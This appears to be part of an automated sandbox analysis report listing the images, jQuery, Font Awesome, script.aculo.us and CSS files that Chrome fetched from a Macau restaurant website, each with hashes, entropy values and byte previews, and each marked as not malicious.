                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d...................................................................................................................................................d........................................................................................!".1A...aB..q2b#3$4.....................!1.A.Qa.....2..q."b.............?...u.e|..DNtD.DNtE"Lyp.1.h.(.a0.s..#y1.D.\.t_EJ..H...S..9...1..x.21...a..1.W....9..r-.}.(C*1".?:)NtD.D^.....+s..Ag....=....R.N..z...:...^.R$..n....>T...V.....P..I.N..?.<.$....W..#^.....[^.q.p..Ym.=.G}.3...-K...b...Xi.|]|....H..'=..U.".-..5.q.:..... .d#.g6P`.fec......1.N(..oV....|...... .....E..o.Q6....u\<.c..p..&.....x..R..+..W.r*.n..+\.1..e..K.."Z"..........O.r&..$.m .%...T...W.....D..U.....6.Ze.......@...N.l....6Es..0S......PT....\.5...![.d.P1E.j.e...Q.}...V.ouE...8,~&>A.)...!.H.#<-.'.........."[.j.B1...Y.. ...>...u{3J....5...?.c.8.b._...!..(.QU..+.....W.Ix.y@>.})z7.....~.YF...u.7.....i....b..c.
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 185x55, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):6434
                                                                                                                                                              Entropy (8bit):7.92423644435855
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:95IVrkNSApxWM0DFBdQ8AbEkGJRaEg86hEg86hEx:95qkNEM0HOvblGJRNXZ
                                                                                                                                                              MD5:E980A1542B1BF210917EABA77A90B7E1
                                                                                                                                                              SHA1:8E9B3A9FC92974B555E37BC2FB72558C086C3B07
                                                                                                                                                              SHA-256:79E3774BE9D744FA6F9FA0718655970BF2FAF5BFCF68B3E447CFCC4800690CE3
                                                                                                                                                              SHA-512:EA8310B905DE5B4CE35E1390454743688C01AA3F12F78AAF5D97274747B96EF8A9C7E9CB9565D6BD982FE7F05FAF906907C96101C432AF7F926D226CBB613CB0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d.................................................................................................................................................7..................................................................................................!1."S..U..AQa...W...2#q..RB.3$.br.DT&.......................!.1Qa.R.....Aq."...S...2.....B.s.br.3c..#$4............?....o....sS_.E..0Q...Y.;...?F<'.6..Y6[.u,q`d{$......K......P..N.-..1a%bo..N.gI=.re).5..?,r....gt(........z....F....gt'...&....L.0...;.>d.E.$.4..>"f...Y...&r..'......6.7u/...O.3.w.<M'.....a..}.wB|...I.i=.|D...K...L.].O.I...&m.n._E..2g"..x.O@..3h.wR.,...9.x...z....F....gt'...&....L.0...;.>d.E.$.4..>"f...Y...&r..'......6.7u/...O.3.w.<M'.....a..}.wB|...I.i=.|D...K...L.].O.I...&m.n._E..2g"..x.O@..3h.wR.,...9.x...z....F....gt'...&....L.0...;.>d.E.$.4..>"f...Y...&r..*.]......../....Q.q.\.X..T.!....]p."..Umc.i#...J.m...n:l..G}.}1.YK..&..^.T\{......
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (32038), with CRLF line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):101469
                                                                                                                                                              Entropy (8bit):5.504765213204441
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:zP10iSi65U/dXXeyhzeBuG+HYE0WEeLzFoNqLTW8+S5VRZIVI6xSb8Ch2ZbQnRm6:q+41VqLTW8xRrqSb8dGH77da98HrR
                                                                                                                                                              MD5:755EFA0A38FE50E625CD639DF257C5AE
                                                                                                                                                              SHA1:28AE1A7F48D335741F7DD849E706F07AF9701C76
                                                                                                                                                              SHA-256:6624051156356F62829D4D4A979E4666EE8BF68226B7ABE7FE0C97D6C1F3016E
                                                                                                                                                              SHA-512:803EED91BC0128283057B511737A8EFF4B3618CD2BDCC82DE87FAD2619296B97BC4C2A96099F80D234BFA1EFF6294346F798EE0069EA25C385CF00E79CA2F5D6
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/m/static/js/jquery-1.11.3.min.js
                                                                                                                                                              Preview:/*! jQuery v1.11.3 | (c) 2005, 2015 jQuery Foundation, Inc. | jquery.org/license */..!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.3",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){re
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=350, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=160], baseline, precision 8, 160x350, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):86879
                                                                                                                                                              Entropy (8bit):7.855292974065513
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:PjqhjtxjqhjtKE60RzA/1cq5ul4smdhMY57+jgYrP/gv9oDm0:PuhLuhdR0/1wlMp+jgYzgv9Ym0
                                                                                                                                                              MD5:A0B53839D78FDEB7E4D5383ED0C3232E
                                                                                                                                                              SHA1:B9E0F2E0B6EF0A27FCAB2AF18E429AA515A3813B
                                                                                                                                                              SHA-256:7CC52F07C250BA0247836F870DABE04B7B2724849231DEB8D92CD30CFE8EA539
                                                                                                                                                              SHA-512:906F939D11D5F7DDF6475093F87ACEA92D20637DE56A25BE718D4C46BD98992B3674E6863FCB547A8DDAD0C59DCC4D943FB2B2E2A6809221BDE15BE7A0631067
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:......Exif..MM.*...........................^...........................................................................(...........1...........2..........i............. ............'.......'.Adobe Photoshop CS6 (Windows).2020:05:28 11:34:23.............0221...................................^...............................n...........v.(.....................~...................H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 59x28, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):506
                                                                                                                                                              Entropy (8bit):5.723315117064499
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:V/XPYhiPRd8jMvEF/liSEebuKnB9gNMi1RHLJPf:dkiPojMvEF/li1ebPnfPi1ff
                                                                                                                                                              MD5:F2B2AFBC6B36A611F64B7E631542E946
                                                                                                                                                              SHA1:7025247DAA734470513B824E3C2319929EAB1DAB
                                                                                                                                                              SHA-256:48D4FA05D63934904971675B19EF3F535C6F5D7C58EC10D3850BFAA5347C2EA7
                                                                                                                                                              SHA-512:AEDE3401F21204CCAF5A3D21C05974391250E5A0C1A1572480B1D0C23FE6EE4392460F54B24451FFFD3300EC63A1D050EB31823D22A5607ACF7FF1BD451E5444
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d...................................................................................................................................................;.............y.................................................................."......!1.AQ2B..........................AQ..1.."B................?..ye....p...8..3..F.. .@0.a..............9..mz.]6-..g.;..1...b{`....._.[kZtJ.t.T1Y..0........H}`.....*.W..eYGZ.-..?+):..~.{..G.Xk.2...n.c.j9R.P..T........
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (30837)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):31000
                                                                                                                                                              Entropy (8bit):4.746143404849733
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:wHu5yWeTUKW+KlkJ5de2UYDyVfwYUas2l8yQ/8dwmaU8G:wwlr+Klk3Yi+fwYUf2l8yQ/e9vf
                                                                                                                                                              MD5:269550530CC127B6AA5A35925A7DE6CE
                                                                                                                                                              SHA1:512C7D79033E3028A9BE61B540CF1A6870C896F8
                                                                                                                                                              SHA-256:799AEB25CC0373FDEE0E1B1DB7AD6C2F6A0E058DFADAA3379689F583213190BD
                                                                                                                                                              SHA-512:49F4E24E55FA924FAA8AD7DEBE5FFB2E26D439E25696DF6B6F20E7F766B50EA58EC3DBD61B6305A1ACACD2C80E6E659ACCEE4140F885B9C9E71008E9001FBF4B
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/m/static/css/font-awesome.min.css
                                                                                                                                                              Preview:/*!. * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License). */@font-face{font-family:'FontAwesome';src:url('../fonts/fontawesome-webfont.eot?v=4.7.0');src:url('../fonts/fontawesome-webfont.eot?#iefix&v=4.7.0') format('embedded-opentype'),url('../fonts/fontawesome-webfont.woff2?v=4.7.0') format('woff2'),url('../fonts/fontawesome-webfont.woff?v=4.7.0') format('woff'),url('../fonts/fontawesome-webfont.ttf?v=4.7.0') format('truetype'),url('../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular') format('svg');font-weight:normal;font-style:normal}.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.fa-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-fw{width:1.
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 185x55, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):7088
                                                                                                                                                              Entropy (8bit):7.912855776248855
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:kE/W1CKRVNzk0uccUGuzn1hapMF6lTQtc5oHJqY+SRfclnwwR0RXSxLF3mddRKSd:kTLvdcUGwtc5+szSxcBgXSxF2dfD
                                                                                                                                                              MD5:F807DD578BB1650146EE8DC00B85B89F
                                                                                                                                                              SHA1:FDA56FA6B9A2F5B35D930451A7E52617BA5F6A12
                                                                                                                                                              SHA-256:849AB671799FD3AE177FA0C8178AF792B744AC8DF6F9830FCFC711FABAFBD001
                                                                                                                                                              SHA-512:57C15610CC82FF8DF911F5481FBE18B8B80014BDB0FEADB9ACC2C14A0F91348C24F10F811D3918AA5F81BD0FE5A60D8D15906963351AAC9ECC3DA4E11C5E55E9
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/images/icon_download.jpg
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d.................................................................................................................................................7................................................................................................!.1a..AQ."..U.W..q.2B#...b....Rr....T.......................!..1AQ....aq"R.T....2.....Br..#3.$.sb..Sc.4............?.....}]...=.q.@...l...t.t7.q...x......q..-....JM....]..S.M..[Z.*.l.S..#Ww.p........g..J..9nn..?.w~3.I.'V.W...U.OG......ww..'4.[.w.p.j....|..W........v...mV.=............un..u......su^a.;..z..N..;.}.[..z..n..?.w~.RsI..y....~..W...y......Ni:.`.:...o....9..0.....=I.'V...\>..z=_.7U.....9......U.OG......ww..'4.[.w.p.j....|..W........v...mV.=............un..u......su^a.;..z..N..;.}.[..z..n..?.w~.RsI..y....~..W...y......Ni:.`.:...o....9..0.....=I.'V...\>..z=_.7U.....9......U.OG......ww..'4.[.w.p.j....|..W........v...mV.=............un..7:..6.qU...
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):2152
                                                                                                                                                              Entropy (8bit):5.320766508345182
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:1zCJrxPvA/HNQHQssoI/Ad38CFf1IZpx+PHHwYqII+IhC/:1aPI/tQHG48YwxqQeuA/
                                                                                                                                                              MD5:696BD054B0069B60748474ABB87B28B7
                                                                                                                                                              SHA1:914DB330C7FE585DFEDDCE713558F04328FB51DB
                                                                                                                                                              SHA-256:1FB311CB22A5D814D9C767F248200DE4377FCCD5FF0645C54746F1F3F5B92658
                                                                                                                                                              SHA-512:B396C1134F31C98B997CC5967AEA18AFB4CBC9582E4F0E050CBC5F0CFA8FF082994DC6DD48105BED62F45A65524CDC368965733BA9F3EA8DABA6A17724E2051B
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/js/scriptaculous.js?load=effects
                                                                                                                                                              Preview:// Copyright (c) 2005 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us).// .// Permission is hereby granted, free of charge, to any person obtaining.// a copy of this software and associated documentation files (the.// "Software"), to deal in the Software without restriction, including.// without limitation the rights to use, copy, modify, merge, publish,.// distribute, sublicense, and/or sell copies of the Software, and to.// permit persons to whom the Software is furnished to do so, subject to.// the following conditions:.// .// The above copyright notice and this permission notice shall be.// included in all copies or substantial portions of the Software..//.// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.// EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.// NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.// LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=308, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=200], baseline, precision 8, 200x308, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):126846
                                                                                                                                                              Entropy (8bit):7.9133105101536
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:ylsMlsxzRIoDlNIbkxg9yVFE7J9aJsAnTqDe9qHZLmwa5GjEATHXFE9HIdjkKz78:ylsMlsb5RFxbNpWSaZKt56E83eHCYWwp
                                                                                                                                                              MD5:53B2886E1DCDBED2430454078637545F
                                                                                                                                                              SHA1:B7B56473D38F2AB58553123B418548F9BAD20FB6
                                                                                                                                                              SHA-256:437AEAE11B711570FCD545E35D3A4F2211A984C7D12952F172F4765E19B2F2D0
                                                                                                                                                              SHA-512:AFB1E0E112C4B8DD9B24C8F0DD509C3765066189126893D3B5FCD1F44E6841375226D6ECE1B0BEDE8FF4AA5B59D79966E18FE3F839D79357A22428E0CA4C18CF
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/images/pic_aboutus.jpg
                                                                                                                                                              Preview:....0.Exif..MM.*...........................4...........................................................................(...........1...........2..........i............. ............'.......'.Adobe Photoshop CS6 (Windows).2020:06:23 10:40:43.............0221..................................4...............................n...........v.(.....................~...................H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 200x40, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):5536
                                                                                                                                                              Entropy (8bit):7.840233365440083
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:yZluohhhhhhhhvx5A//EF/9b/NlIhKjpq5Bb6oon+WV7XRajxgSaTpfw35KzEKwc:yZgwx5AUF/dzcKjpq2J1ojxgnCI4K20
                                                                                                                                                              MD5:7292C3B5F5446AD96721ABA89502B2B1
                                                                                                                                                              SHA1:30C002AC559D646CB7E361A7F2C3CFCAF374A6C9
                                                                                                                                                              SHA-256:A823E689692895A2802F8D854CFCAD87E8E1C0050E5784BF3ECC42D60EE5C88B
                                                                                                                                                              SHA-512:A9C811668501F93F0D0483CCA492AEBB8EB7E10F26B730A8858C087AEBCD97D9A51B8C385330F257A2AD2579D4A2BE2498A676FDEA7002E5844014A7CC75F754
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d.................................................................................................................................................(...............................................................................................!...1R....T.U..AQ".aq.2.b.#.Br...$.......................!Q...1R..Aa..S...q..."..2..#cB.3C.............?..i.l.X.\.DZ...).....\.3...r..\.K.o....C.g.*.....1.k.!.-...9.-%\...)+.^.Z..v.b..+....'.......).-.<...f..WqN..=LN!.Y..ym/..#.qO..8.......g...,.0.....=LN!.Y..ym/..#.qO..8.......g...,.0.....=LN!.Y..ym/..#.qO..8.......g...,.0.....=LN!.Y..ym/..#.qO..8.......g...,.0.....=LN!.Y..ym/..#.qO..8.......g...,.0.....=LN!.Y..ym/..#.qO..8.......g...,.0.....=LN!.Y..ym/..#.qO..8.......g...,.0.....=LN!.Y..ym/..#.qO..8.......g...,.0.....=LN!.Y..ym/..#.qO..8.......g...,.0.....=LN!.Y..ym/..#.qO..8.C<...YuI..Fj.$.(.......<...f..dTL;..c.K..U.HH...y....3j.B9...z+.D.O,...Y.a..l....8.33.K.Kn..Y..LJ
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=14, height=3744, bps=182, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 5D Mark II, orientation=upper-left, width=5616], baseline, precision 8, 500x334, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):256111
                                                                                                                                                              Entropy (8bit):7.943253287046111
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3072:DL8xL8bc3OFfoTZm1uz2VjssSq15QtsNV442SwKgDNI/TD0XzVMk2bcLzmYgDfN1:0ao3Om9M5j/aI0DNiTD0XzV/Nvfq/1l
                                                                                                                                                              MD5:2962447065DE643D14C1F007947E370B
                                                                                                                                                              SHA1:90E596B5CD993FBA53F42E9E15F83068F71C376D
                                                                                                                                                              SHA-256:D0464F31520796CA6C66440B00B2DAA8332A4623DE2DEB10AF1693E84CD74C47
                                                                                                                                                              SHA-512:1FF1DE18D48F2EB1E1B579D3D961B3D71BA0892F7B8B93A24775985B813C13F5D5B8502DAE0DDFC87472DF27D4072DA72D1448CAE42EF0631CCDF62C90061A4E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:....83Exif..II*...............................................................................................................................(...........1...........2...........i...........8.........Canon.Canon EOS 5D Mark II...$..'....$..'..Adobe Photoshop CS6 (Windows).2020:06:22 10:08:59.............................."...........'.......d...........0221....................................................................................................................30..........30..........30..................................N.......................................................................................1...........2...........4.......$.......................2013:11:08 13:06:34.2013:11:08 13:06:34.................................d.........U......!9.....930611067.d.......d.......................EF100mm f/2.8 Macro.......................................(................................4......H.......H............XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IE
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=28, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=105], baseline, precision 8, 105x28, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):20342
                                                                                                                                                              Entropy (8bit):6.88156007253464
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:OYNMtKwZRsR+p28y4lH7pYNMtKwZRsR+9HknnPdrCXwIKgCDS9mUNc:OYNg7sRPiFYNg7sSEnnPdrCXgiNc
                                                                                                                                                              MD5:F761ADCB0EFFD78D6CD1D7644FEF45CC
                                                                                                                                                              SHA1:887C343F28FF71F2889080C44FB9889EE3881849
                                                                                                                                                              SHA-256:FB3E7C75C1229B2B9A3381E1F8B51C8A2CE4837D68D199491399BF6034C24129
                                                                                                                                                              SHA-512:982699224D31C3039DBA290A29A8490DE8BBB1091C21D92E681BF6A8B5A7C0283B2E45A7420F1506F847035022ABFFD6CC0400EE0FE7402B53699583A48F9D57
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:......Exif..MM.*...............i.......................................................................................(...........1...........2..........i............. ............'.......'.Adobe Photoshop CS6 (Windows).2020:05:26 16:36:05.............0221.......................i...........................................n...........v.(.....................~...........J.......H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=129, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=970], baseline, precision 8, 970x129, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):30262
                                                                                                                                                              Entropy (8bit):6.883081573201049
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:oYygPtVYyHE9je9XKnJLgykiklUvaDvIKq:oiVrE9je9XKnJLXkikloYvIKq
                                                                                                                                                              MD5:08B64A973E61C5725183887DFDB598AB
                                                                                                                                                              SHA1:8DCE0882154F6D651624419EAA3BBF0DFBA9FD74
                                                                                                                                                              SHA-256:97E9CAC1251CDA64464E273FD53044A118377E8A66D190E8E0A6917D4BB364E1
                                                                                                                                                              SHA-512:0B6715FA02A46B6966C535C72B02F14106426A8D90E7C16D57D8B49E68B77DD7533C4A475BF137959D6F4F51E64F47267D4AF56BD2EF65DC7BBE6FB2F7F70BE2
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:......Exif..MM.*.......................................................................................................(...........1...........2..........i............. ............'.......'.Adobe Photoshop CS6 (Windows).2020:06:30 13:23:44.............0221..................................................................n...........v.(.....................~...........!.......H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (362), with CRLF line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):3629
                                                                                                                                                              Entropy (8bit):5.533024732932184
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:V9hfZWMt990srqmZJm3D7FH3D7FF1uUAy/8w/bVH:zhfkMt990srjZJm3D7FH3D7FF1PAwl
                                                                                                                                                              MD5:08473B56018220A6FAC98F9650ACFBEF
                                                                                                                                                              SHA1:E5FD5AB926C3C8D05367A2223B10D1F3072CE502
                                                                                                                                                              SHA-256:A30B591E79BAFABD108A5DCD369E0D2817DFE2CDAD60C11C1A0D8363E94A74FE
                                                                                                                                                              SHA-512:8420019346E41CD705E2E7A031303B1999CDE6BF28A2EEA3C1425E3AFA94E84432D9E79F6E69300DDCC694D37B19D38F2D9A1745D4944680FBA0E5348E974466
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/fenye.css
                                                                                                                                                              Preview:BODY { SCROLLBAR-FACE-COLOR: #dee3e7; FONT-SIZE: 12px; SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #dee3e7; COLOR: #000000; SCROLLBAR-3DLIGHT-COLOR: #d1d7dc; SCROLLBAR-ARROW-COLOR: #006699; SCROLLBAR-TRACK-COLOR: #EFEFEF; FONT-FAMILY: Arial; SCROLLBAR-DARKSHADOW-COLOR: #98aab1 ;margin-left:0px;margin-top:0px;margin-right:0px;margin-bottom:0px;}..table{FONT-SIZE: 12px; COLOR: #000000; FONT-FAMILY: Arial;}..td{FONT-SIZE: 12px; COLOR: #000000; FONT-FAMILY: Arial;}..p{MARGIN-LEFT:0px;MARGIN-TOP:5px;MARGIN-RIGHT:0px;MARGIN-BOTTOM:5px;}...tbsep {...PADDING-RIGHT: 3px; PADDING-LEFT: 3px; FONT: 9px Arial; COLOR: #8B6A28; TEXT-ALIGN: center;..}...sitebarfy {...PADDING-RIGHT: 0px; BORDER-TOP: #F0F0F0 0px solid; PADDING-LEFT: 0px; FONT-SIZE: 11px;COLOR: #8B6A28; BACKGROUND: #fff; PADDING-BOTTOM: 2px; PADDING-TOP: 2px; BORDER-BOTTOM: #F0F0F0 0px dotted; FONT-FAMILY: Arial;width:100%;..}...fy0 {...BORDER-RIGHT: ; PADDING-RIGHT: 3px; BORDER-TOP: ; PADDING-LEFT: 3px; BACKGROUND: ; PAD
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 200x40, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):5536
                                                                                                                                                              Entropy (8bit):7.840233365440083
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:yZluohhhhhhhhvx5A//EF/9b/NlIhKjpq5Bb6oon+WV7XRajxgSaTpfw35KzEKwc:yZgwx5AUF/dzcKjpq2J1ojxgnCI4K20
                                                                                                                                                              MD5:7292C3B5F5446AD96721ABA89502B2B1
                                                                                                                                                              SHA1:30C002AC559D646CB7E361A7F2C3CFCAF374A6C9
                                                                                                                                                              SHA-256:A823E689692895A2802F8D854CFCAD87E8E1C0050E5784BF3ECC42D60EE5C88B
                                                                                                                                                              SHA-512:A9C811668501F93F0D0483CCA492AEBB8EB7E10F26B730A8858C087AEBCD97D9A51B8C385330F257A2AD2579D4A2BE2498A676FDEA7002E5844014A7CC75F754
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/images/productMain_icon.jpg
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d.................................................................................................................................................(...............................................................................................!...1R....T.U..AQ".aq.2.b.#.Br...$.......................!Q...1R..Aa..S...q..."..2..#cB.3C.............?..i.l.X.\.DZ...).....\.3...r..\.K.o....C.g.*.....1.k.!.-...9.-%\...)+.^.Z..v.b..+....'.......).-.<...f..WqN..=LN!.Y..ym/..#.qO..8.......g...,.0.....=LN!.Y..ym/..#.qO..8.......g...,.0.....=LN!.Y..ym/..#.qO..8.......g...,.0.....=LN!.Y..ym/..#.qO..8.......g...,.0.....=LN!.Y..ym/..#.qO..8.......g...,.0.....=LN!.Y..ym/..#.qO..8.......g...,.0.....=LN!.Y..ym/..#.qO..8.......g...,.0.....=LN!.Y..ym/..#.qO..8.......g...,.0.....=LN!.Y..ym/..#.qO..8.......g...,.0.....=LN!.Y..ym/..#.qO..8.C<...YuI..Fj.$.(.......<...f..dTL;..c.K..U.HH...y....3j.B9...z+.D.O,...Y.a..l....8.33.K.Kn..Y..LJ
